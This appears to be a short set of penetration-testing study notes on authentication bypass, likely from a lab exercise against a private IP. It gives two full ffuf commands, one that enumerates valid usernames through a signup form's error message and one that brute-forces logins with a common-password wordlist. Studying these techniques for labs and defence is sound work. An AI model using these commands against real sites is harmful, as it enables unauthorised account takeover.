Authentication Bypass

Username enumeration

  • look for forms to try using a common username

  • if there is an error saying 'account already in use'

  • ffuf can be used to enumerate this to get a list of valid usernames

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.43.85/customers/signup -mr "username already exists"

brute force

  • once you have a list of potential/valid usernames, you can attempt to brute force a login

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.43.85/customers/login -fc 200
PreviousBasic BypassNextIDOR

Last updated